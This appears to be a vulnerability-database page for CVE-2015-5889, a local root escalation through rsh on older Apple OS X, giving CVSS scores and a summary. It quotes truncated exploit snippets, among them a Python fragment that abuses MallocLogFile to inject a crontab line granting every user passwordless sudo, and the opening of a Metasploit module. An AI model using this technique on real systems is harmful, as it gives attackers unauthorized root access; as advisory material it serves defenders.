7.2
CVSSv2

CVE-2015-5889

Published: 09/10/2015 Updated: 24/12/2016
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 730
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

rsh in the remote_cmds component in Apple OS X prior to 10.11 allows local users to obtain root privileges via vectors involving environment variables.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

apple mac os x

Exploits

The default root-suid binary /usr/bin/rsh on Mac OS X uses execv() in an insecure manner /usr/bin/rsh will invoke /usr/bin/rlogin if launched with only a host argument, without dropping privileges or clearing the environment This exploit will pass "MallocLogFile" to /usr/bin/rsh, which is then passed on to rlogin and interpreted by libmalloc to c ...
# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root # tested on osx 1095 / 10105 # jul/2015 # by rebel import os,time,sys env = {} s = osstat("/etc/sudoers")st_size env['MallocLogFile'] = '/etc/crontab' env['MallocStackLogging'] = 'yes' env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" &g ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Local Rank = NormalRanking include Msf::Post::OSX::System include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {} ...